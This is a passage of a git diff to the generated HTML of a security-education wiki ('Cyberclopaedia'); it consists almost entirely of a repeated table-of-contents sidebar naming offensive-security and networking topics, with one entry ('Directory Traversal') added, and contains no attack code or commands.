        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -188,22 +188,6 @@

Introduction - - diff --git a/docs/Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html b/docs/Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html index 30ec8e37..32565795 100644 --- a/docs/Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html +++ b/docs/Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -234,22 +234,6 @@

Cracking th - - diff --git a/docs/Hardware Hacking/Wireless Attacks/Hacking WPA Networks.html b/docs/Hardware Hacking/Wireless Attacks/Hacking WPA Networks.html index 2fe51077..b41fff48 100644 --- a/docs/Hardware Hacking/Wireless Attacks/Hacking WPA Networks.html +++ b/docs/Hardware Hacking/Wireless Attacks/Hacking WPA Networks.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
